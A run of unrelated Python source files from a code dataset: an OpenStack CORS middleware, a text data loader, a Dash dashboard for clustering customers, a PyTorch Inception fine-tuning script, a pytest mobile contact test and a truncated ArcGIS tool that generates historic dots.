'Last-Modified',\n        'Pragma'\n    ]\n\n    def __init__(self, application, conf=None):\n        super(CORS, self).__init__(application)\n\n        # Begin constructing our configuration hash.\n        self.allowed_origins = {}\n\n        # Sanity check. Do we have an oslo.config? If so, load it. Else, assume\n        # that we'll use add_config.\n        if conf:\n            self._init_from_oslo(conf)\n\n    def _init_from_oslo(self, conf):\n        '''Initialize this middleware from an oslo.config instance.'''\n\n        # First, check the configuration and register global options.\n        conf.register_opts(CORS_OPTS, 'cors')\n\n        # Clone our original CORS_OPTS, and set the defaults to whatever is\n        # set in the global conf instance. 
This is done explicitly (instead\n        # of **kwargs), since we don't want to accidentally catch\n        # allowed_origin.\n        subgroup_opts = copy.deepcopy(CORS_OPTS)\n        cfg.set_defaults(subgroup_opts,\n                         allow_credentials=conf.cors.allow_credentials,\n                         expose_headers=conf.cors.expose_headers,\n                         max_age=conf.cors.max_age,\n                         allow_methods=conf.cors.allow_methods,\n                         allow_headers=conf.cors.allow_headers)\n\n        # If the default configuration contains an allowed_origin, don't\n        # forget to register that.\n        if conf.cors.allowed_origin:\n            self.add_origin(**conf.cors)\n\n        # Iterate through all the loaded config sections, looking for ones\n        # prefixed with 'cors.'\n        for section in conf.list_all_sections():\n            if section.startswith('cors.'):\n                # Register with the preconstructed defaults\n                conf.register_opts(subgroup_opts, section)\n                self.add_origin(**conf[section])\n\n    def add_origin(self, allowed_origin, allow_credentials=True,\n                   expose_headers=None, max_age=None, allow_methods=None,\n                   allow_headers=None):\n        '''Add another origin to this filter.\n\n        :param allowed_origin: Protocol, host, and port for the allowed origin.\n        :param allow_credentials: Whether to permit credentials.\n        :param expose_headers: A list of headers to expose.\n        :param max_age: Maximum cache duration.\n        :param allow_methods: List of HTTP methods to permit.\n        :param allow_headers: List of HTTP headers to permit from the client.\n        :return:\n        '''\n\n        if allowed_origin in self.allowed_origins:\n            LOG.warn('Allowed origin [%s] already exists, skipping' % (\n                allowed_origin,))\n            return\n\n        self.allowed_origins[allowed_origin] = {\n            'allow_credentials': allow_credentials,\n            'expose_headers': expose_headers,\n            'max_age': max_age,\n            'allow_methods': allow_methods,\n            'allow_headers': allow_headers\n        }\n\n    def process_response(self, response, request=None):\n        '''Check for CORS headers, and decorate if necessary.\n\n        Perform two checks. First, if an OPTIONS request was issued, let the\n        application handle it, and (if necessary) decorate the response with\n        preflight headers. In this case, if a 404 is thrown by the underlying\n        application (i.e. 
if the underlying application does not handle\n        OPTIONS requests), the response code is overridden.\n\n        In the case of all other requests, regular request headers are applied.\n        '''\n\n        # Sanity precheck: If we detect CORS headers provided by something\n        # in the middleware chain, assume that it knows better.\n        if 'Access-Control-Allow-Origin' in response.headers:\n            return response\n\n        # Double-check for an OPTIONS request.\n        if request.method == 'OPTIONS':\n            return self._apply_cors_preflight_headers(request=request,\n                                                      response=response)\n\n        # Apply regular CORS headers.\n        self._apply_cors_request_headers(request=request, response=response)\n\n        # Finally, return the response.\n        return response\n\n    def _split_header_values(self, request, header_name):\n        \"\"\"Convert a comma-separated header value into a list of values.\"\"\"\n        values = []\n        if header_name in request.headers:\n            for value in request.headers[header_name].rsplit(','):\n                value = value.strip()\n                if value:\n                    values.append(value)\n        return values\n\n    def _apply_cors_preflight_headers(self, request, response):\n        \"\"\"Handle CORS Preflight (Section 6.2)\n\n        Given a request and a response, apply the CORS preflight headers\n        appropriate for the request.\n        \"\"\"\n\n        # If the response contains a 2XX code, we have to assume that the\n        # underlying middleware's response content needs to be persisted.\n        # Otherwise, create a new response.\n        if 200 > response.status_code or response.status_code >= 300:\n            response = webob.response.Response(status=webob.exc.HTTPOk.code)\n\n        # Does the request have an origin header? (Section 6.2.1)\n        if 'Origin' not in request.headers:\n            return response\n\n        # Is this origin registered? (Section 6.2.2)\n        origin = request.headers['Origin']\n        if origin not in self.allowed_origins:\n            if '*' in self.allowed_origins:\n                origin = '*'\n            else:\n                LOG.debug('CORS request from origin \\'%s\\' not permitted.'\n                          % (origin,))\n                return response\n        cors_config = self.allowed_origins[origin]\n\n        # If there's no request method, exit. (Section 6.2.3)\n        if 'Access-Control-Request-Method' not in request.headers:\n            return response\n        request_method = request.headers['Access-Control-Request-Method']\n\n        # Extract Request headers. If parsing fails, exit. (Section 6.2.4)\n        try:\n            request_headers = \\\n                self._split_header_values(request,\n                                          'Access-Control-Request-Headers')\n        except Exception:\n            LOG.debug('Cannot parse request headers.')\n            return response\n\n        # Compare request method to permitted methods (Section 6.2.5)\n        if request_method not in cors_config['allow_methods']:\n            return response\n\n        # Compare request headers to permitted headers, case-insensitively.\n        # (Section 6.2.6)\n        for requested_header in request_headers:\n            upper_header = requested_header.upper()\n            permitted_headers = (cors_config['allow_headers'] +\n                                 self.simple_headers)\n            if upper_header not in (header.upper() for header in\n                                    permitted_headers):\n                return response\n\n        # Set the default origin permission headers. (Sections 6.2.7, 6.4)\n        response.headers['Vary'] = 'Origin'\n        response.headers['Access-Control-Allow-Origin'] = origin\n\n        # Does this CORS configuration permit credentials? (Section 6.2.7)\n        if cors_config['allow_credentials']:\n            response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n        # Attach Access-Control-Max-Age if appropriate. (Section 6.2.8)\n        if 'max_age' in cors_config and cors_config['max_age']:\n            response.headers['Access-Control-Max-Age'] = \\\n                str(cors_config['max_age'])\n\n        # Attach Access-Control-Allow-Methods. 
(Section 6.2.9)\n        response.headers['Access-Control-Allow-Methods'] = request_method\n\n        # Attach Access-Control-Allow-Headers. (Section 6.2.10)\n        if request_headers:\n            response.headers['Access-Control-Allow-Headers'] = \\\n                ','.join(request_headers)\n\n        return response\n\n    def _apply_cors_request_headers(self, request, response):\n        \"\"\"Handle Basic CORS Request (Section 6.1)\n\n        Given a request and a response, apply the CORS headers appropriate\n        for the request to the response.\n        \"\"\"\n\n        # Does the request have an origin header? (Section 6.1.1)\n        if 'Origin' not in request.headers:\n            return\n\n        # Is this origin registered? (Section 6.1.2)\n        origin = request.headers['Origin']\n        if origin not in self.allowed_origins:\n            LOG.debug('CORS request from origin \\'%s\\' not permitted.'\n                      % (origin,))\n            return\n        cors_config = self.allowed_origins[origin]\n\n        # Set the default origin permission headers. (Sections 6.1.3 & 6.4)\n        response.headers['Vary'] = 'Origin'\n        response.headers['Access-Control-Allow-Origin'] = origin\n\n        # Does this CORS configuration permit credentials? (Section 6.1.3)\n        if cors_config['allow_credentials']:\n            response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n        # Attach the exposed headers and exit. (Section 6.1.4)\n        if cors_config['expose_headers']:\n            response.headers['Access-Control-Expose-Headers'] = \\\n                ','.join(cors_config['expose_headers'])\n","sub_path":"oslo_middleware/cors.py","file_name":"cors.py","file_ext":"py","file_size_in_byte":12928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"377802537","text":"import os\nimport gzip\nimport cPickle\nimport csv\nimport json\n\nimport theano.tensor as T\nimport theano\n# from theano import *\nimport numpy as np\nimport re\nfrom cle.cle.data import Iterator\nfrom nips2015_vrnn.datasets.unk import UNK\n\n# from utils import *\n\nclass datahandler(object):\n    def refinedata(self):\n        path = \"/Volumes/DATA/Project/Python/nips2015_vrnn/datasets/nipstxt/\"\n        max_len = 0\n        tokre = re.compile(r'\\b\\S{1,2}\\b')\n        for fold in os.listdir(path):\n            if fold.startswith(\"out_nips\"):\n                print(fold)\n                dic = path + \"refined_\" + fold\n                if not os.path.exists(dic):\n                    os.makedirs(dic)\n                for fname in os.listdir(path + fold):\n                    with open(path + fold + \"/\" + fname) as f:\n                        for sent in f:\n                            sent = tokre.sub('', sent) # re.sub returns a new string; it does not modify in place\n                            toklst = sent.split(\" \")\n\n\n    def dataloader(self, path, outfile, maxfile, par):\n        MAX_LEN = 100 # max len of sentence\n        MIN_TOK = 2\n\n        cor = []\n        doc = []\n        max_num_sen = par[0]\n        max_num_wd = 0\n        num_wd = par[1]\n        value = -1\n        isfirstline = True\n        countdoc = 0\n        bat_sz = 200\n        max_num_wd_block = cPickle.load(open(maxfile, 'rb'))\n        with open(path, 'r') as f:\n            for line in f:\n                if isfirstline:\n                    print('File - %s \\n' %line)\n                    if countdoc%bat_sz==0:\n                        max_num_wd = max_num_wd_block[0]\n                        if len(max_num_wd_block) > 0:\n                            max_num_wd_block = max_num_wd_block[1:]\n                    countdoc += 1\n                    isfirstline = False\n                    continue\n                if line.strip() == '' and len(doc) > 0:\n                    # if len(doc) > max_num_sen:\n                    #     max_num_sen = len(doc)\n                    cor.append(doc)\n                    # del doc[:] # reset doc\n                    doc = [] # using a new array\n                    isfirstline = True\n                    continue\n                sn = line.strip().split(\" \")\n                sn = [int(w) for w in sn]\n                # for w in sn:\n                #     if w > num_wd:\n                #         num_wd = w\n                if len(sn) >= 1:\n                    # if len(sn) > max_num_wd:\n                    #     max_num_wd = len(sn)\n                    sent = max_num_wd*[value]\n                    sent[-len(sn):] = sn # pre-padding with the fill value (-1)\n                    doc.append(sent)\n\n        print('Max_len_doc: %d\\n' %max_num_sen)\n        print('Max_len_sen: %d\\n' 
%max_num_wd)\n        print('Num_vocab: %d\\n' %(num_wd+1))\n        cPickle.dump(cor,open(outfile, mode=\"wb\"))\n\n\n\n\nif __name__ == '__main__':\n    dt = datahandler()\n    path = '/Volumes/DATA/Project/Python/nips2015_vrnn/datasets/Ads/'\n    # dt.dataloader(path + 'Idx_Out_Review_stns.dat', path + 'data_dump', [63, 62, 18316])\n    dt.dataloader(path + 'Idx_Out_Ads_stns.dat', path + 'data_dump', path + 'max_num_wd_batches', [87, 15978])\n    cor = cPickle.load(open(path + 'data_dump', mode=\"rb\"))\n    # data_path = path + 'data_dump'\n    # train_x = UNK(path=data_path)\n    # data=Iterator(train_x, 10, start=0, end=1989)\n    # lengths = [len(s) for s in data]\n    print(len(cor))\n    print(cor[0])\n\n\n","sub_path":"utils/datahandler.py","file_name":"datahandler.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"582751708","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport dash_table\nimport numpy as np\nimport pandas as pd\n\n# load the datasets\ndf_customers = pd.read_csv('../data/customers.csv')\n\ndf_customers = df_customers[['pred_cluster','age','category','gender', 'upgraded','score1', 'score2', 'score3']]\n\n# values for our dropdown\n# removed 'upgraded', 'gender', 'category' since they only grouped the dataset into 2 parts.\ndropdown_val = ['age', 'score1', 'score2', 'score3']\n\n# define color palette\ncolors = [\"#E41A1C\", \"#377EB8\", \"#4DAF4A\", \"#984EA3\", \"#FF7F00\", \"#FFFF33\", \"#A65628\", \"#F781BF\", \"#999999\"]\n\n\napp = dash.Dash()\n###############################################################################\n# build out the HTML\n\nPAGE_SIZE = 5\n# begin making html page\napp.layout = html.Div([\n\t\t\t\t\t\thtml.Div([\n\t\t\t\t\t\t\thtml.H1(\"Red Crown Consulting\"),\n\t\t                    html.P(\"Customer look-alike tool\")\n\t\t\t\t\t\t],className=\"jumbotron text-center\"),\n\n\t\t\t\t\t\thtml.Div([\n\t\t\t\t\t\thtml.H6(\"Clustering of known customers\"),\n\t\t\t\t\t\thtml.Hr()\n\t\t\t\t\t\t]),\n\n                        dcc.Dropdown(className=\"col-md-2\", style={\"margin-bottom\": \"10px\"}, id=\"dropdown_x\",\n                            options=[\n                                {'label': val, 'value': val} for val in dropdown_val\n                            ],\n                            value=dropdown_val[0]\n                        ),\n\n                    \tdcc.Dropdown(className=\"col-md-2\", id=\"dropdown_y\",\n                    \t\toptions=[\n                    \t\t{'label': val, 'value': val} for val in dropdown_val\n                    \t\t],\n                    \t\tvalue=dropdown_val[1]\n                    \t),\n\n                        html.Div([\n                        \t\tdcc.Graph(id=\"cluster\")\n                        \t\t],style={\"padding\": \"20px\"}),\n\n                        html.Div([\n\t\t\t\t\t\thtml.Br()\n\t\t\t\t\t\t]),\n\n\n                        dash_table.DataTable(\n                            id='table-filtering',\n                            columns=[\n                                {\"name\": i, \"id\": i} for i in sorted(df_customers.columns)\n                            ],\n\n                            pagination_settings={\n                                'current_page': 0,\n                                'page_size': PAGE_SIZE\n                            },\n                            pagination_mode='be',\n                            filtering='be',\n                            filtering_settings=''\n                        )\n\t\t\t\t\t], className=\"container\", style={\"padding\": \"10px\"})\n\n# import external css\napp.css.append_css({\"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css\"})\n# import external javascript\napp.scripts.append_script({\"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js\"})\n\n##################################################\n#                                                #\n#       Callback Functions to update plots       #\n#                                                #\n##################################################\n@app.callback(Output('cluster', 'figure'), [Input('dropdown_x', 'value'), 
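# the scatter figure re-renders whenever either dropdown value changes\n               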
Input('dropdown_y', 'value')])\ndef update_graph(x_val, y_val):\n\t# count number of clusters\n\tnum_of_clusters = df_customers[\"pred_cluster\"].nunique()\n\t# create empty data list to store traces\n\tdata = []\n\n    # data.append({\n    #     \"x\": [190134.88923284,116928.23926923,44090.25903961],\n    #     \"y\": [32.57335128,35.01601022,37.36368854],\n    #     \"type\": \"scatter\",\n    #     \"name\": \"Centroids\",\n    #     \"mode\": \"markers\",\n    #     \"marker\": dict(\n    #         color = \"#F781BF\",\n    #         size = 13)})\n\n\t# plot the actual labels\n\tfor i in range(num_of_clusters):\n\t    # split up the clusters to visualize\n\t    cluster_df = df_customers[df_customers[\"pred_cluster\"] == i]\n\t    data.append({\n\t        \"x\": cluster_df[x_val],\n\t        \"y\": cluster_df[y_val],\n\t        \"type\": \"scatter\",\n\t        \"name\": \"Cluster_\"+str(i),\n\t        \"mode\": \"markers\",\n\t        \"marker\": dict(\n\t            color = colors[i],\n\t            size = 13\n\t        )\n\t    })\n\n\n\tlayout = {\n\t    \"hovermode\": \"closest\",\n\t    \"margin\": {\n\t        \"r\": 10,\n\t        \"t\": 25,\n\t        \"b\": 40,\n\t        \"l\": 60\n\t    },\n\t    \"title\": \"Customer Dataset - \"+ x_val + \" vs \" + y_val,\n\t    \"xaxis\": {\n\t        \"domain\": [0, 1],\n\t        \"title\": x_val\n\t    },\n\t    \"yaxis\": {\n\t        \"domain\": [0, 1],\n\t        \"title\": y_val\n\t    }\n\t}\n\n\tfig = {\"data\":data, \"layout\": layout}\n\treturn fig\n\n@app.callback(\n    Output('table-filtering', 'data'),\n    [Input('table-filtering', 'pagination_settings'),\n     Input('table-filtering', 'filtering_settings')])\ndef update_table(pagination_settings, filtering_settings): # renamed from update_graph to avoid a duplicate function name\n    print(filtering_settings)\n    filtering_expressions = filtering_settings.split(' && ')\n    dff = df_customers\n    for flt in filtering_expressions: # 'flt' avoids shadowing the built-in filter()\n        if ' eq ' in flt:\n            col_name = flt.split(' eq ')[0]\n            filter_value = flt.split(' eq ')[1]\n            dff = dff.loc[dff[col_name] == filter_value]\n        if ' > ' in flt:\n            col_name = flt.split(' > ')[0]\n            filter_value = float(flt.split(' > ')[1])\n            dff = dff.loc[dff[col_name] > filter_value]\n        if ' < ' in flt:\n            col_name = flt.split(' < ')[0]\n            filter_value = float(flt.split(' < ')[1])\n            dff = dff.loc[dff[col_name] < filter_value]\n    return dff.iloc[\n        pagination_settings['current_page']*pagination_settings['page_size']:\n        (pagination_settings['current_page'] + 1)*pagination_settings['page_size']\n    ].to_dict('rows')\n\n\nif __name__ == '__main__':\n    app.run_server()\n","sub_path":"Lookalike-Project/customer_app/dashboard_customers.py","file_name":"dashboard_customers.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"622253629","text":"'''\nmodified from http://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html\nand https://github.com/yunjey/pytorch-tutorial/blob/master/tutorials/12%20-%20Deep%20Q%20Network/dqn13.py\n'''\n\nfrom __future__ import print_function\nimport math\nimport random\nimport numpy as np\nimport sys\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom collections import namedtuple\nfrom itertools import count\nfrom copy import deepcopy\nimport time\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable as var\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport torchvision.transforms as T\nimport torchvision.models as M\nimport torchvision.datasets as datasets\n\nimport inception\n\nimage_folder = '../../imgs'\nnEpochs = 
100\nlearning_rate = 0.01\nbatch_size = 5\n\nUSE_CUDA = torch.cuda.is_available()\n#USE_CUDA = False\nif USE_CUDA:\n    import torch.backends.cudnn as cudnn\n    cudnn.benchmark = True\n    torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n# dtype = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\n\ndef create_plots(results,name):\n    folder = os.path.join(os.getcwd(),name)\n    if not os.path.exists(folder):\n        os.mkdir(folder)\n\n    training_acc, testing_acc = results\n    epochs = range(nEpochs)\n\n    ys = [training_acc, testing_acc]\n    scatters = []\n\n    colors = cm.rainbow(np.linspace(0, 1, len(ys)))\n    for y, c in zip(ys, colors):\n        scatters.append(plt.scatter(epochs, y, color=c, s=10))\n\n    plt.legend(tuple(scatters),\n               ('Training', 'Testing'),\n               scatterpoints=1,\n               loc='lower right',\n               ncol=3,\n               fontsize=8)\n\n    plt.title('Accuracies vs. Epochs')\n    #plt.show()\n    plt.draw()\n    fig = plt.gcf()\n    fig.savefig(os.path.join(folder,'accs_no_aug_lr-001_bs-05.png'))\n    plt.clf()\n\ndef train_test_split(dataset, test_size = 0.25, shuffle = False, random_seed = 0):\n    \"\"\" Return a list of split indices from a DataSet.\n    Indices can be used with DataLoader to build a train and testing set.\n\n    Arguments:\n        A Dataset\n        A test_size, as a float between 0 and 1 (percentage split) or as an int (fixed number split)\n        Shuffling True or False\n        Random seed\n    \"\"\"\n    length = len(dataset)\n    indices = list(range(length)) # include index 0; starting at 1 would silently drop the first sample\n\n    if shuffle == True:\n        random.seed(random_seed)\n        random.shuffle(indices)\n\n    if type(test_size) is float:\n        split = math.floor(test_size * length)\n    elif type(test_size) is int:\n        split = test_size\n    else:\n        raise ValueError('%s should be an int or a float' % test_size)\n    return indices[split:], indices[:split]\n\n# accepts path to root images directory\n# returns two DataLoaders --- one for training and another for testing\ndef load_data(image_folder):\n\n    normalize = T.Normalize(mean=[0.485, 0.456, 0.406],\n                            std=[0.229, 0.224, 0.225])\n    training_transforms = T.Compose([\n        T.RandomSizedCrop(299),\n        T.RandomHorizontalFlip(),\n        T.ToTensor(),\n        normalize,\n    ])\n\n    testing_transforms = T.Compose([\n        T.Scale(299),\n        T.CenterCrop(299),\n        T.ToTensor(),\n        normalize,\n    ])\n\n    # note: testing transforms are used for both sets here (a no-augmentation run)\n    training_ds = datasets.ImageFolder(image_folder, testing_transforms)\n    testing_ds = datasets.ImageFolder(image_folder, testing_transforms)\n\n    # indices randomly selected from all instances in dataset to be used\n    # for either training or testing\n    train_indices, test_indices = train_test_split(training_ds, shuffle=True)\n\n    train_sampler = SubsetRandomSampler(train_indices)\n    test_sampler = SubsetRandomSampler(test_indices)\n\n    # Both dataloaders load from the same dataset but with different indices\n    train_loader = DataLoader(training_ds,\n                              batch_size=20,\n                              sampler=train_sampler,\n                              num_workers=4,\n                              pin_memory=True)\n\n    test_loader = DataLoader(testing_ds,\n                             batch_size=1,\n                             sampler=test_sampler,\n                             num_workers=1,\n                             pin_memory=True)\n\n    return train_loader, test_loader\n\ndef main():\n    # model = M.vgg19(pretrained=True)\n    # model = M.inception_v3(pretrained=True,aux_logits=False)\n\n    # the aux_logits handling is awkward, so inception.py is redefined to ignore it;\n    # transform_input is identical to the normalize Transform, which we already do\n    model = inception.inception_v3(pretrained=True,transform_input=False)\n    for param in model.parameters():\n        # freeze all the layers\n        param.requires_grad = False\n    # Replace the last fully-connected layer\n    # Parameters of newly constructed modules have requires_grad=True by default\n    model.fc = 
nn.Linear(2048, 2) # Inception v3's final pooled features are 2048-dim; change this if the backbone changes\n    #model.classifier._modules['6'] = nn.Linear(4096,2)\n\n    # hack to get Inception_v3 to work (if aux_logits=True)\n    #model.AuxLogits = M.inception.InceptionAux(768,2)\n\n    if USE_CUDA:\n        model = model.cuda()\n\n    train_loader, test_loader = load_data(image_folder)\n\n    # define loss function (criterion) and optimizer\n    criterion = nn.CrossEntropyLoss().cuda() if USE_CUDA else nn.CrossEntropyLoss()\n\n    optimizer = optim.SGD(model.fc.parameters(), learning_rate,\n                          momentum=0.9,\n                          weight_decay=1e-4)\n\n    train_start = time.time()\n\n    train_accs = []\n    test_accs = []\n    for epoch in range(nEpochs):\n        #adjust_learning_rate(optimizer, epoch)\n\n        # train for one epoch\n        train_acc = train(train_loader, model, criterion, optimizer, epoch)\n        test_acc = test(test_loader, model, criterion, epoch)\n\n        train_accs.append(train_acc)\n        test_accs.append(test_acc)\n\n    train_end = time.time()\n\n    print('Total Training/Testing Time: %.3f' % (train_end - train_start))\n\n    results = (train_accs, test_accs)\n    create_plots(results,'Results')\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n    batch_time = AverageMeter()\n    data_time = AverageMeter()\n    losses = AverageMeter()\n    top1 = AverageMeter()\n\n    # switch to train mode\n    model.train()\n\n    end = time.time()\n    for i, (input, target) in enumerate(train_loader):\n        # measure data loading time\n        data_time.update(time.time() - end)\n\n        if USE_CUDA:\n            input = input.cuda()\n            target = target.cuda()\n\n        input_var = var(input)\n        target_var = var(target)\n\n        #print('okay0')\n        # compute output\n        output = model(input_var)\n        #output = nn.Softmax()(output)\n        #print('okay6')\n        loss = criterion(output, target_var)\n        #print('okay7')\n\n        # measure accuracy and record loss\n        prec1 = accuracy(output.data, target, topk=(1,))\n        losses.update(loss.data[0], input.size(0))\n        top1.update(prec1[0], input.size(0))\n\n        # compute gradient and do SGD step\n        optimizer.zero_grad()\n        #print('okay8')\n        loss.backward()\n        #print('okay9')\n        optimizer.step()\n        #print('okay10')\n\n        # measure elapsed time\n        batch_time.update(time.time() - end)\n        end = time.time()\n\n    print('Epoch: [%d]\\n'\n          '\\tTraining Set Performance:\\n'\n          '\\t\\tTime %.3f (avg: %.3f)\\n'\n          '\\t\\tData %.3f (avg: %.3f)\\n'\n          '\\t\\tLoss %.3f (avg: %.3f)\\n'\n          % (epoch,\n             batch_time.val, batch_time.avg,\n             data_time.val, data_time.avg,\n             losses.val, losses.avg), end='')\n    print('\\n\\t\\tAccuracy {} (avg: {})\\t'.format(top1.val[0],top1.avg[0]))\n\n    return top1.avg[0]\n\n\ndef test(test_loader, model, criterion, epoch):\n    batch_time = AverageMeter()\n    data_time = AverageMeter()\n    #losses = AverageMeter()\n    top1 = AverageMeter()\n\n    # switch to evaluate mode\n    model.eval()\n\n    end = time.time()\n    for i, (input, target) in enumerate(test_loader):\n        data_time.update(time.time() - end)\n\n        if USE_CUDA:\n            input = input.cuda()\n            target = target.cuda()\n        input_var = torch.autograd.Variable(input, volatile=True)\n        target_var = torch.autograd.Variable(target, volatile=True)\n\n        # compute output\n        output = model(input_var)\n        #output = nn.Softmax()(output)\n        #loss = criterion(output, target_var)\n\n        # measure accuracy and record loss\n        prec1 = accuracy(output.data, target, topk=(1,))\n        #print(prec1)\n        #losses.update(loss.data[0], input.size(0))\n        top1.update(prec1[0], input.size(0))\n\n        # measure elapsed time\n        batch_time.update(time.time() - end)\n        end = time.time()\n\n    '''\n    print(' * Prec@1 {top1.avg:.3f}'\n          .format(top1=top1))\n    '''\n    
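# accuracy() returns a list of one-element tensors (one per k in topk),\n    # so top1.avg is itself a one-element tensor and [0] extracts the scalar\n    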
print('\\n\\tTest_Accuracy: {}'.format(top1.avg[0]))\n\n    return top1.avg[0]\n\ndef accuracy(output, target, topk=(1,)):\n    \"\"\"Computes the precision@k for the specified values of k\"\"\"\n    maxk = max(topk)\n    batch_size = target.size(0)\n\n    #print(output)\n    #print(target)\n\n    _, pred = output.topk(maxk, 1, True, True)\n    pred = pred.t()\n    correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n    #print(correct)\n\n    res = []\n    for k in topk:\n        correct_k = correct[:k].view(-1).float().sum(0)\n        res.append(correct_k.mul_(100.0 / batch_size))\n\n    #print(res)\n    return res\n\nclass AverageMeter(object):\n    \"\"\"Computes and stores the average and current value\"\"\"\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n    main()\n","sub_path":"final_proj/src/pytorch/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"629707248","text":"from base.base_driver import initdriver\nfrom base.read_data import read_yaml\nfrom page.page import Page\nimport pytest\n\n\nclass TestContact:\n    def setup(self):\n        self.driver=initdriver()\n        self.page=Page(self.driver)\n    def teardown(self):\n        self.driver.quit()\n    @pytest.mark.parametrize(\"args\",read_yaml(\"test_content1\",\"contact_data.yaml\"))\n    #def test_contact(self,name,phone):\n    @pytest.allure.severity(pytest.allure.severity_level.BLOCKER)\n    def test_contact1(self,args):\n        print(args)\n        print(args[\"name\"])\n        self.page.contact().click_contact()\n        self.page.add_page().click_keeplocal()\n        self.page.setcount().input_name(args[\"name\"])\n        self.page.setcount().input_phone(args[\"phone\"])\n\n\n\n    # @pytest.mark.parametrize((\"name\", \"phone\"), [(\"wang\", 121), (\"li\", 333)])\n    #def test_contact2(self):\n\n\n\n","sub_path":"scripts/test_contact.py","file_name":"test_contact.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"169581302","text":"\"\"\"\r\n    historicd.py\r\n    This is an implementation of the historic-dots technique by Ken Field\r\n\r\n    Programmed by Linda Beale, Esri Inc\r\n\r\n    Description: Creates historic dots from an input elevation raster\r\n\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport arcpy\r\n\r\n\r\nclass HistoricDots(object):\r\n    \"\"\"Historic Dots Tool class\"\"\"\r\n    \r\n    def __init__(self):\r\n        \"\"\"Define the tool (tool name is the name of the class).\"\"\"\r\n        self.label = \"Historic Dots\"\r\n        self.description = \"\"\r\n        self.canRunInBackground = False\r\n\r\n    def getParameterInfo(self):\r\n        \"\"\"Define parameter definitions\"\"\"\r\n        \r\n        in_dem = arcpy.Parameter(\r\n            name='input_dem',\r\n            displayName='Input DEM',\r\n            datatype='GPRasterLayer',\r\n            direction='Input',\r\n            parameterType='Required')\r\n\r\n        out_feature_class = arcpy.Parameter(\r\n            name='out_feature_class',\r\n            displayName='Output Feature Class',\r\n            datatype='DEFeatureClass',\r\n            direction='Output',\r\n            parameterType='Required')\r\n        \r\n        # Use __file__ attribute to find the .lyr file\r\n        out_feature_class.symbology = \\\r\n            os.path.join(os.path.dirname(os.path.dirname(__file__)),\r\n                         'LayerFiles', \r\n                         'contour_dot.lyr')\r\n        \r\n        contour_interval = arcpy.Parameter(\r\n            name='contour_interval',\r\n            
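# the elevation interval between generated contours, in the DEM's z-units\r\n            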
displayName='Contour Interval',\r\n            datatype='GPLong',\r\n            direction='Input',\r\n            parameterType='Required') \r\n        \r\n        base_contour = arcpy.Parameter(\r\n            name='base_contour',\r\n            displayName='Base Contour',\r\n            datatype='GPLong',\r\n            direction='Input',\r\n            parameterType='Optional') \r\n        \r\n        base_contour.value = 0 # default\r\n\r\n        z_factor = arcpy.Parameter(\r\n            name='z_factor',\r\n            displayName='Z Factor',\r\n            datatype='GPLong',\r\n            direction='Input',\r\n            parameterType='Optional')\r\n\r\n        z_factor.value = 1 # default\r\n\r\n        params = [in_dem, out_feature_class, contour_interval, base_contour,\r\n                  z_factor]\r\n        \r\n        return params\r\n\r\n    def isLicensed(self):\r\n        \"\"\"Set whether tool is licensed to execute.\"\"\"\r\n        try:\r\n            if arcpy.CheckExtension(\"spatial\") != \"Available\":\r\n                raise Exception\r\n        except Exception:\r\n            return False # tool cannot be executed\r\n\r\n        return True # tool can be executed\r\n\r\n    def updateParameters(self, parameters):\r\n        \"\"\"Modify the values and properties of parameters before internal\r\n        validation is performed. This method is called whenever a parameter\r\n        has been changed.\"\"\"\r\n        \r\n        return\r\n\r\n    def updateMessages(self, parameters):\r\n        \"\"\"Modify the messages created by internal validation for each tool\r\n        parameter. This method is called after internal validation.\"\"\"\r\n        \r\n        if parameters[2].value and parameters[2].value <= 0:\r\n            parameters[2].setErrorMessage('Contour Interval must be greater than 0') \r\n        \r\n        if parameters[4].value is not None and parameters[4].value <= 0: # guard against an empty optional value\r\n            parameters[4].setErrorMessage('Z Factor must be greater than 0') \r\n        \r\n        return\r\n\r\n    def execute(self, parameters, messages):\r\n        \"\"\"The source code of the tool.\"\"\"\r\n\r\n        param_values = (p.valueAsText for p in parameters)\r\n\r\n        try:\r\n            historic_dots(*param_values)\r\n        except Exception as err:\r\n            arcpy.AddError(err)\r\n            sys.exit(1)\r\n\r\n        return\r\n\r\n\r\ndef historic_dots(in_DEM, out_fc, contour_width, base_contour, z_factor):\r\n    \"\"\"\r\n    historic_dots: calculates historic dots\r\n\r\n    Required arguments:\r\n    Inputs:\r\n        in_DEM -- Input DEM.\r\n        contour_width -- contour width.\r\n        base_contour -- base contour value.\r\n        z_factor -- z value.\r\n    Outputs:\r\n        out_fc -- output Feature Class.\r\n    \"\"\"\r\n    # Check out the Spatial Analyst license\r\n    